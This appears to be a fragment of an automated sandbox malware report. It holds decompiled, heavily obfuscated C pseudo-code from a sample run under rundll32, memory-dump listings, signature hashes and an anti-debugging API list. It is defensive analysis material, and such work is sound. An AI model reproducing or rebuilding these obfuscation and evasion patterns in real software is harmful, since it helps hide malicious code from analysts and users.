                                                                                                                      				_v32 = _v32 * 9;
                                                                                                                      				_v32 = _v32 ^ 0x000ec3b0;
                                                                                                                      				_v60 = 0x6ca766;
                                                                                                                      				_v60 = _v60 + 0x1f13;
                                                                                                                      				_v60 = _v60 * 0x1b;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0xc778512f;
                                                                                                                      				_v12 = 0x6aa94;
                                                                                                                      				_v12 = _v12 + 0x5212;
                                                                                                                      				_v12 = _v12 ^ 0x000734b5;
                                                                                                                      				_v48 = 0xd6268c;
                                                                                                                      				_v48 = _v48 / _t232;
                                                                                                                      				_t233 = 0x26;
                                                                                                                      				_v48 = _v48 / _t233;
                                                                                                                      				_v48 = _v48 + 0x646;
                                                                                                                      				_v48 = _v48 ^ 0x000e3e3b;
                                                                                                                      				_v52 = 0x57df31;
                                                                                                                      				_t234 = 0x5e;
                                                                                                                      				_v52 = _v52 / _t234;
                                                                                                                      				_v52 = _v52 >> 4;
                                                                                                                      				_v52 = _v52 << 0x10;
                                                                                                                      				_v52 = _v52 ^ 0x0ef79a5c;
                                                                                                                      				_v8 = 0x5569b0;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x000ef288;
                                                                                                                      				_v44 = 0x5fa9ce;
                                                                                                                      				_v44 = _v44 + 0xffff7bdd;
                                                                                                                      				_v44 = _v44 << 1;
                                                                                                                      				_t235 = 0x65;
                                                                                                                      				_v44 = _v44 / _t235;
                                                                                                                      				_v44 = _v44 ^ 0x000c777c;
                                                                                                                      				_v36 = 0x515ebf;
                                                                                                                      				_v36 = _v36 | 0x64797e59;
                                                                                                                      				_v36 = _v36 ^ 0x4915d5d4;
                                                                                                                      				_v36 = _v36 ^ 0x2d62d183;
                                                                                                                      				_v16 = 0xf90c33;
                                                                                                                      				_v16 = _v16 * 0x1d;
                                                                                                                      				_v16 = _v16 ^ 0x1c3bb4ce;
                                                                                                                      				_v80 = 0x303e6a;
                                                                                                                      				_v80 = _v80 + 0xaf21;
                                                                                                                      				_v80 = _v80 ^ 0x45872c25;
                                                                                                                      				_v80 = _v80 + 0xffff3867;
                                                                                                                      				_v80 = _v80 ^ 0x45bdee21;
                                                                                                                      				_v20 = 0xb8b4ba;
                                                                                                                      				_v20 = _v20 + 0x3a99;
                                                                                                                      				_v20 = _v20 ^ 0x00b083c3;
                                                                                                                      				_v40 = 0xb582c8;
                                                                                                                      				_v40 = _v40 + 0x432d;
                                                                                                                      				_v40 = _v40 | 0xfff7ef9a;
                                                                                                                      				_v40 = _v40 ^ 0xfff9a351;
                                                                                                                      				_v24 = 0x3e85d;
                                                                                                                      				_v24 = _v24 * 0x1b;
                                                                                                                      				_v24 = _v24 + 0xffffd227;
                                                                                                                      				_v24 = _v24 ^ 0x006c1bcc;
                                                                                                                      				_v4 = 0x28c504;
                                                                                                                      				_v4 = _v4 + 0xffffee75;
                                                                                                                      				_v4 = _v4 ^ 0x002a9648;
                                                                                                                      				do {
                                                                                                                      					while(_t262 != 0x8d90b87) {
                                                                                                                      						if(_t262 == 0x991fac7) {
                                                                                                                      							return E0034F88A(_v40, _v24, _v4,  *(_t261 + 0x30));
                                                                                                                      						}
                                                                                                                      						if(_t262 == 0xa3f1429) {
                                                                                                                      							_push(_t235);
                                                                                                                      							_t224 = E00358D71(_v64, _v68, __eflags, _v72, _v76, _t227);
                                                                                                                      							_t265 =  &(_t264[4]);
                                                                                                                      							 *(_t261 + 0x30) = _t224;
                                                                                                                      							__eflags = _t224;
                                                                                                                      							if(_t224 != 0) {
                                                                                                                      								E0034EE05(_v56, _v32, _v60, _t224, _t224);
                                                                                                                      								_t235 =  *(_t261 + 0x30);
                                                                                                                      								E0035E713(_t235, _v12, _v48, _v52);
                                                                                                                      								_t264 =  &(_t265[6]);
                                                                                                                      								_t262 = 0x8d90b87;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t262 == 0xd46e588) {
                                                                                                                      								_t262 = 0xa3f1429;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t262 != 0xf9322b8) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t235 = E00342F34;
                                                                                                                      									_t224 = E00354EFF(E00342F34, _v36, E00342F34, E00342F34, _v16, _v80, E00342F34, _v20, _t261);
                                                                                                                      									_t264 =  &(_t264[8]);
                                                                                                                      									 *(_t261 + 0x24) = _t224;
                                                                                                                      									if(_t224 == 0) {
                                                                                                                      										_t262 = 0x991fac7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t224;
                                                                                                                      						L18:
                                                                                                                      					}
                                                                                                                      					_t235 = _v8;
                                                                                                                      					_t222 = E00352BDE(_t235,  *(_t261 + 0x30), _v44);
                                                                                                                      					_t264 =  &(_t264[1]);
                                                                                                                      					 *(_t261 + 0xc) = _t222;
                                                                                                                      					__eflags = _t222;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t262 = 0x991fac7;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t262 = 0xf9322b8;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t262 - 0x74fce14;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t224;
                                                                                                                      			}

                                                                                                                      0x00000000
                                                                                                                      0x0035533c
                                                                                                                      0x00355342
                                                                                                                      0x00000000
                                                                                                                      0x00355348
                                                                                                                      0x0035535c
                                                                                                                      0x00355361
                                                                                                                      0x00355366
                                                                                                                      0x00355369
                                                                                                                      0x0035536e
                                                                                                                      0x00355374
                                                                                                                      0x00000000
                                                                                                                      0x00355374
                                                                                                                      0x0035536e
                                                                                                                      0x00355342
                                                                                                                      0x0035533a
                                                                                                                      0x0035542d
                                                                                                                      0x00000000
                                                                                                                      0x0035542d
                                                                                                                      0x003553e3
                                                                                                                      0x003553e7
                                                                                                                      0x003553ec
                                                                                                                      0x003553ef
                                                                                                                      0x003553f2
                                                                                                                      0x003553f4
                                                                                                                      0x00355400
                                                                                                                      0x00000000
                                                                                                                      0x003553f6
                                                                                                                      0x003553f6
                                                                                                                      0x00000000
                                                                                                                      0x003553f6
                                                                                                                      0x00000000
                                                                                                                      0x00355402
                                                                                                                      0x00355402
                                                                                                                      0x00355402
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: e028c81bbbb25b330d1a2aa9cb693fe417b136c261e4dc5fa3b273cdf1e3312f
                                                                                                                      • Instruction ID: 2c590a8d84dd21b7734e30a2136e2d3a9d62f8076121ddf9b437d0722e5899be
                                                                                                                      • Opcode Fuzzy Hash: e028c81bbbb25b330d1a2aa9cb693fe417b136c261e4dc5fa3b273cdf1e3312f
                                                                                                                      • Instruction Fuzzy Hash: F7A165B1808781AFD358CF25C48981BFBF1BBC4358F408A1DF99A96260D7B1D9498F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction ID: 507c20c1e61512489ef28f25289f4d37d9bc9ee57db3d69d2177bc050be51aa9
                                                                                                                      • Opcode Fuzzy Hash: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction Fuzzy Hash: 3D21FFB4801320CFFB11DF28EDC56483BA4FB88315F10206AE50D87A71EBB16680AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00352BF6() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				void* _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				void* _t442;
                                                                                                                      				intOrPtr _t446;
                                                                                                                      				intOrPtr _t448;
                                                                                                                      				signed int _t458;
                                                                                                                      				signed int _t460;
                                                                                                                      				void* _t461;
                                                                                                                      				void* _t492;
                                                                                                                      				signed int _t502;
                                                                                                                      				intOrPtr _t503;
                                                                                                                      				intOrPtr* _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				signed int _t514;
                                                                                                                      				void* _t515;
                                                                                                                      				signed int* _t518;
                                                                                                                      				void* _t521;
                                                                                                                      
                                                                                                                      				_t518 =  &_v1760;
                                                                                                                      				_v1576 = 0xf21b90;
                                                                                                                      				_v1596 = _v1596 & 0x00000000;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t505 = 0x2b;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t461 = 0x34076d8;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v1580 = 0xbaeef6;
                                                                                                                      				_v1580 = _v1580 + 0xba3c;
                                                                                                                      				_v1580 = _v1580 ^ 0x00bba91b;
                                                                                                                      				_v1660 = 0x2ae6d5;
                                                                                                                      				_v1660 = _v1660 << 6;
                                                                                                                      				_v1660 = _v1660 / _t505;
                                                                                                                      				_v1660 = _v1660 ^ 0x0030dab5;
                                                                                                                      				_v1716 = 0xb009df;
                                                                                                                      				_v1716 = _v1716 ^ 0xf6c25862;
                                                                                                                      				_v1716 = _v1716 + 0xcd46;
                                                                                                                      				_v1716 = _v1716 + 0x716d;
                                                                                                                      				_v1716 = _v1716 ^ 0xf6739072;
                                                                                                                      				_v1588 = 0x61188e;
                                                                                                                      				_v1588 = _v1588 ^ 0xbe54106a;
                                                                                                                      				_v1588 = _v1588 ^ 0xbe3508e6;
                                                                                                                      				_v1600 = 0x5c78c8;
                                                                                                                      				_v1600 = _v1600 | 0xa4208796;
                                                                                                                      				_v1600 = _v1600 ^ 0xa47cffde;
                                                                                                                      				_v1684 = 0xfd831d;
                                                                                                                      				_v1684 = _v1684 << 5;
                                                                                                                      				_v1684 = _v1684 >> 0xc;
                                                                                                                      				_v1684 = _v1684 ^ 0x0001fb16;
                                                                                                                      				_v1608 = 0x3a7886;
                                                                                                                      				_v1608 = _v1608 + 0xffff806f;
                                                                                                                      				_v1608 = _v1608 ^ 0x003b1c87;
                                                                                                                      				_v1616 = 0x5dea07;
                                                                                                                      				_t506 = 9;
                                                                                                                      				_v1616 = _v1616 * 0x59;
                                                                                                                      				_v1616 = _v1616 ^ 0x20ad8776;
                                                                                                                      				_v1708 = 0xdb05ba;
                                                                                                                      				_v1708 = _v1708 ^ 0x457fa961;
                                                                                                                      				_v1708 = _v1708 | 0x4dd1de05;
                                                                                                                      				_v1708 = _v1708 + 0xffff2bcd;
                                                                                                                      				_v1708 = _v1708 ^ 0x4dffde68;
                                                                                                                      				_v1740 = 0x5f9fa;
                                                                                                                      				_v1740 = _v1740 >> 0x10;
                                                                                                                      				_v1740 = _v1740 * 0x47;
                                                                                                                      				_v1740 = _v1740 / _t506;
                                                                                                                      				_v1740 = _v1740 ^ 0x0003f3c1;
                                                                                                                      				_v1700 = 0xeda1e9;
                                                                                                                      				_v1700 = _v1700 << 0xb;
                                                                                                                      				_t507 = 0x4c;
                                                                                                                      				_v1700 = _v1700 * 0x17;
                                                                                                                      				_v1700 = _v1700 ^ 0xcc50fc90;
                                                                                                                      				_v1688 = 0xc376bf;
                                                                                                                      				_v1688 = _v1688 + 0xffffce34;
                                                                                                                      				_v1688 = _v1688 << 0xf;
                                                                                                                      				_v1688 = _v1688 ^ 0xa27d2095;
                                                                                                                      				_v1736 = 0x77df39;
                                                                                                                      				_v1736 = _v1736 >> 4;
                                                                                                                      				_v1736 = _v1736 >> 7;
                                                                                                                      				_v1736 = _v1736 / _t507;
                                                                                                                      				_v1736 = _v1736 ^ 0x0006bba1;
                                                                                                                      				_v1744 = 0xdb3f7a;
                                                                                                                      				_v1744 = _v1744 << 0xc;
                                                                                                                      				_t508 = 0x46;
                                                                                                                      				_v1744 = _v1744 / _t508;
                                                                                                                      				_t509 = 0x2e;
                                                                                                                      				_v1744 = _v1744 / _t509;
                                                                                                                      				_v1744 = _v1744 ^ 0x0009adba;
                                                                                                                      				_v1620 = 0x28e24f;
                                                                                                                      				_v1620 = _v1620 << 1;
                                                                                                                      				_v1620 = _v1620 ^ 0x00586b21;
                                                                                                                      				_v1720 = 0xedf2ea;
                                                                                                                      				_v1720 = _v1720 >> 0xd;
                                                                                                                      				_v1720 = _v1720 << 0xd;
                                                                                                                      				_v1720 = _v1720 + 0xd060;
                                                                                                                      				_v1720 = _v1720 ^ 0x00e1c656;
                                                                                                                      				_v1728 = 0x3692b9;
                                                                                                                      				_v1728 = _v1728 + 0xffff0cc0;
                                                                                                                      				_v1728 = _v1728 ^ 0x15726ff1;
                                                                                                                      				_v1728 = _v1728 << 7;
                                                                                                                      				_v1728 = _v1728 ^ 0xa3f1c3b7;
                                                                                                                      				_v1628 = 0xe9d0b6;
                                                                                                                      				_v1628 = _v1628 + 0xffff0b2c;
                                                                                                                      				_v1628 = _v1628 ^ 0x00e13fcd;
                                                                                                                      				_v1672 = 0xb5656;
                                                                                                                      				_v1672 = _v1672 << 1;
                                                                                                                      				_t510 = 0x75;
                                                                                                                      				_v1672 = _v1672 / _t510;
                                                                                                                      				_v1672 = _v1672 ^ 0x0000c760;
                                                                                                                      				_v1636 = 0xb446a;
                                                                                                                      				_t511 = 0x66;
                                                                                                                      				_v1636 = _v1636 * 0x2c;
                                                                                                                      				_v1636 = _v1636 ^ 0x01e018a2;
                                                                                                                      				_v1612 = 0x7754cf;
                                                                                                                      				_v1612 = _v1612 ^ 0x9195c63c;
                                                                                                                      				_v1612 = _v1612 ^ 0x91eaa7e8;
                                                                                                                      				_v1656 = 0x90fdf5;
                                                                                                                      				_v1656 = _v1656 | 0x8a72400d;
                                                                                                                      				_v1656 = _v1656 / _t511;
                                                                                                                      				_v1656 = _v1656 ^ 0x015bbc23;
                                                                                                                      				_v1664 = 0xea1595;
                                                                                                                      				_v1664 = _v1664 ^ 0x656fc689;
                                                                                                                      				_t512 = 0x1d;
                                                                                                                      				_v1664 = _v1664 / _t512;
                                                                                                                      				_v1664 = _v1664 ^ 0x0381a839;
                                                                                                                      				_v1724 = 0x1903df;
                                                                                                                      				_v1724 = _v1724 ^ 0xd471d85a;
                                                                                                                      				_v1724 = _v1724 << 9;
                                                                                                                      				_v1724 = _v1724 + 0xa250;
                                                                                                                      				_v1724 = _v1724 ^ 0xd1be858e;
                                                                                                                      				_v1592 = 0x634acd;
                                                                                                                      				_v1592 = _v1592 >> 1;
                                                                                                                      				_v1592 = _v1592 ^ 0x0031fc8c;
                                                                                                                      				_v1624 = 0x214267;
                                                                                                                      				_v1624 = _v1624 >> 0xe;
                                                                                                                      				_v1624 = _v1624 ^ 0x000cae4b;
                                                                                                                      				_v1748 = 0xf70b55;
                                                                                                                      				_v1748 = _v1748 ^ 0x8376c783;
                                                                                                                      				_v1748 = _v1748 + 0xffff9546;
                                                                                                                      				_v1748 = _v1748 ^ 0x30c8a062;
                                                                                                                      				_v1748 = _v1748 ^ 0xb347cf79;
                                                                                                                      				_v1644 = 0x4a974c;
                                                                                                                      				_v1644 = _v1644 + 0xf754;
                                                                                                                      				_v1644 = _v1644 ^ 0x0044301a;
                                                                                                                      				_v1756 = 0xfefcd0;
                                                                                                                      				_v1756 = _v1756 + 0xffff9941;
                                                                                                                      				_v1756 = _v1756 << 0xc;
                                                                                                                      				_v1756 = _v1756 + 0x3291;
                                                                                                                      				_v1756 = _v1756 ^ 0xe96b65aa;
                                                                                                                      				_v1632 = 0x34bd00;
                                                                                                                      				_v1632 = _v1632 << 0xd;
                                                                                                                      				_v1632 = _v1632 ^ 0x97a30bc0;
                                                                                                                      				_v1676 = 0xf19685;
                                                                                                                      				_t513 = 0x7b;
                                                                                                                      				_v1676 = _v1676 * 0x54;
                                                                                                                      				_v1676 = _v1676 ^ 0x1e84cba5;
                                                                                                                      				_v1676 = _v1676 ^ 0x51c47a4f;
                                                                                                                      				_v1652 = 0x3d5ed0;
                                                                                                                      				_v1652 = _v1652 * 7;
                                                                                                                      				_v1652 = _v1652 / _t513;
                                                                                                                      				_v1652 = _v1652 ^ 0x0004a817;
                                                                                                                      				_v1668 = 0x31208a;
                                                                                                                      				_v1668 = _v1668 << 3;
                                                                                                                      				_v1668 = _v1668 + 0x3afc;
                                                                                                                      				_v1668 = _v1668 ^ 0x0186e9ee;
                                                                                                                      				_v1692 = 0x9120a;
                                                                                                                      				_v1692 = _v1692 + 0xffff3905;
                                                                                                                      				_v1692 = _v1692 ^ 0x12b553f3;
                                                                                                                      				_v1692 = _v1692 ^ 0x12bb5ad6;
                                                                                                                      				_v1680 = 0x26d3f8;
                                                                                                                      				_v1680 = _v1680 << 7;
                                                                                                                      				_v1680 = _v1680 + 0xa827;
                                                                                                                      				_v1680 = _v1680 ^ 0x136c77e8;
                                                                                                                      				_v1584 = 0x751146;
                                                                                                                      				_v1584 = _v1584 << 7;
                                                                                                                      				_v1584 = _v1584 ^ 0x3a8d2dd0;
                                                                                                                      				_v1732 = 0x266ad0;
                                                                                                                      				_v1732 = _v1732 + 0xffffe92f;
                                                                                                                      				_v1732 = _v1732 | 0xe77a0674;
                                                                                                                      				_v1732 = _v1732 << 8;
                                                                                                                      				_v1732 = _v1732 ^ 0x7e56f20f;
                                                                                                                      				_v1640 = 0xc95fbf;
                                                                                                                      				_v1640 = _v1640 >> 1;
                                                                                                                      				_v1640 = _v1640 ^ 0x006563fc;
                                                                                                                      				_v1752 = 0xe51758;
                                                                                                                      				_v1752 = _v1752 + 0x7d69;
                                                                                                                      				_v1752 = _v1752 << 8;
                                                                                                                      				_v1752 = _v1752 >> 5;
                                                                                                                      				_v1752 = _v1752 ^ 0x0727d5ea;
                                                                                                                      				_v1696 = 0x906e7e;
                                                                                                                      				_t514 = 0x72;
                                                                                                                      				_v1696 = _v1696 / _t514;
                                                                                                                      				_v1696 = _v1696 << 0xd;
                                                                                                                      				_v1696 = _v1696 ^ 0x288be572;
                                                                                                                      				_v1760 = 0xae4c89;
                                                                                                                      				_v1760 = _v1760 >> 4;
                                                                                                                      				_v1760 = _v1760 * 0x14;
                                                                                                                      				_v1760 = _v1760 | 0x4c6e4d0e;
                                                                                                                      				_v1760 = _v1760 ^ 0x4cfa322f;
                                                                                                                      				_v1704 = 0x3b4ff5;
                                                                                                                      				_v1704 = _v1704 + 0xd6b6;
                                                                                                                      				_v1704 = _v1704 << 0x10;
                                                                                                                      				_v1704 = _v1704 << 0xe;
                                                                                                                      				_v1704 = _v1704 ^ 0xc00053ef;
                                                                                                                      				_v1604 = 0xa38704;
                                                                                                                      				_v1604 = _v1604 + 0xffffb37d;
                                                                                                                      				_v1604 = _v1604 ^ 0x00a5c604;
                                                                                                                      				_v1712 = 0x302894;
                                                                                                                      				_v1712 = _v1712 << 6;
                                                                                                                      				_v1712 = _v1712 + 0xffffae4b;
                                                                                                                      				_v1712 = _v1712 + 0xffff6004;
                                                                                                                      				_v1712 = _v1712 ^ 0x0c025a19;
                                                                                                                      				_t515 = 0x5a6577d;
                                                                                                                      				_t517 = _v1596;
                                                                                                                      				_t502 = _v1596;
                                                                                                                      				_t460 = _v1596;
                                                                                                                      				_v1648 = 0xc7a381;
                                                                                                                      				_v1648 = _v1648 ^ 0xa2d00ae3;
                                                                                                                      				_v1648 = _v1648 >> 0xa;
                                                                                                                      				_v1648 = _v1648 ^ 0x002465a0;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t492 = 0x5c;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t521 = _t461 - _t515;
                                                                                                                      							if(_t521 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t461 - 0x744da3a;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_push(_v1744);
                                                                                                                      								_push(_v1736);
                                                                                                                      								_push(0x3410fc);
                                                                                                                      								_t442 = E0034AB66(_v1700, _v1688, __eflags);
                                                                                                                      								E0035C66E( &_v1560, __eflags);
                                                                                                                      								_t446 =  *0x36520c; // 0x0
                                                                                                                      								_t448 =  *0x36520c; // 0x0
                                                                                                                      								__eflags = _t448 + 0x220;
                                                                                                                      								E0035BDB5( &_v520, _t448 + 0x220, _v1620, _v1720, _v1728, _v1628, _t448 + 0x220, _v1672, _v1636, _t446 + 8,  &_v1560,  &_v1040, _t442);
                                                                                                                      								E0034AE03(_v1612, _v1656, _v1664, _t442);
                                                                                                                      								_t518 =  &(_t518[0x10]);
                                                                                                                      								_t461 = 0xe241e24;
                                                                                                                      								_t515 = 0x5a6577d;
                                                                                                                      								_t492 = 0x5c;
                                                                                                                      								goto L26;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t461 - 0xe241e24;
                                                                                                                      								if(_t461 == 0xe241e24) {
                                                                                                                      									_t503 =  *0x36520c; // 0x0
                                                                                                                      									_t504 = _t503 + 0x220;
                                                                                                                      									while(1) {
                                                                                                                      										__eflags =  *_t504 - _t492;
                                                                                                                      										if( *_t504 == _t492) {
                                                                                                                      											break;
                                                                                                                      										}
                                                                                                                      										_t504 = _t504 + 2;
                                                                                                                      										__eflags = _t504;
                                                                                                                      									}
                                                                                                                      									_t502 = _t504 + 2;
                                                                                                                      									_t461 = 0x4f55465;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t461 - 0xe6f489b;
                                                                                                                      									if(_t461 != 0xe6f489b) {
                                                                                                                      										goto L26;
                                                                                                                      									} else {
                                                                                                                      										E0035E689(_v1704, _v1604, _v1712, _t460, _v1648);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L20:
                                                                                                                      							return _v1596;
                                                                                                                      						}
                                                                                                                      						if(_t521 == 0) {
                                                                                                                      							E0035E689(_v1640, _v1752, _v1696, _t517, _v1760);
                                                                                                                      							_t518 =  &(_t518[3]);
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							if(_t461 == 0x2fdd9cd) {
                                                                                                                      								E0035EE94(_t517, _t460, _v1584, _v1732);
                                                                                                                      								_t461 = _t515;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								if(_t461 == 0x34076d8) {
                                                                                                                      									_push(_t461);
                                                                                                                      									E0034EA7B( &_v1040, _v1608, _v1580, _t461, _v1616, _v1708, _v1740);
                                                                                                                      									_t518 =  &(_t518[7]);
                                                                                                                      									_t461 = 0x744da3a;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t492 = 0x5c;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t461 == 0x4f55465) {
                                                                                                                      										_t460 = E0034EB36(_v1724, _v1592, _t461, _v1660);
                                                                                                                      										_t518 =  &(_t518[3]);
                                                                                                                      										__eflags = _t460;
                                                                                                                      										if(_t460 != 0) {
                                                                                                                      											_t461 = 0x5350d19;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t492 = 0x5c;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t461 != 0x5350d19) {
                                                                                                                      											goto L26;
                                                                                                                      										} else {
                                                                                                                      											_t458 = E00350188(_t461, _v1624, _t460, _v1748, _t502, _v1644, _v1716, _t502, _v1756, _v1632, _v1676, _t461, _v1652, _v1684, _t461, _t461, _v1668, _v1600, _v1692, _t461,  &_v520, _v1588, _v1680);
                                                                                                                      											_t517 = _t458;
                                                                                                                      											_t518 =  &(_t518[0x15]);
                                                                                                                      											if(_t458 == 0) {
                                                                                                                      												L15:
                                                                                                                      												_t461 = 0xe6f489b;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													_t492 = 0x5c;
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t461 = 0x2fdd9cd;
                                                                                                                      												_v1596 = 1;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													_t492 = 0x5c;
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L20;
                                                                                                                      						L26:
                                                                                                                      						__eflags = _t461 - 0xbde599c;
                                                                                                                      					} while (_t461 != 0xbde599c);
                                                                                                                      					goto L20;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00353273
                                                                                                                      0x00353273
                                                                                                                      0x00353275
                                                                                                                      0x00353276
                                                                                                                      0x00353276
                                                                                                                      0x00353276
                                                                                                                      0x00353276
                                                                                                                      0x00353278
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003533e4
                                                                                                                      0x003533ea
                                                                                                                      0x00353454
                                                                                                                      0x00353458
                                                                                                                      0x00353464
                                                                                                                      0x00353469
                                                                                                                      0x00353477
                                                                                                                      0x00353492
                                                                                                                      0x003534b0
                                                                                                                      0x003534b5
                                                                                                                      0x003534d1
                                                                                                                      0x003534ec
                                                                                                                      0x003534f1
                                                                                                                      0x003534f4
                                                                                                                      0x003534f9
                                                                                                                      0x00353500
                                                                                                                      0x00000000
                                                                                                                      0x003533ec
                                                                                                                      0x003533ec
                                                                                                                      0x003533f2
                                                                                                                      0x00353431
                                                                                                                      0x00353437
                                                                                                                      0x00353442
                                                                                                                      0x00353442
                                                                                                                      0x00353445
                                                                                                                      0x00000000
                                                                                                                      0x00000000
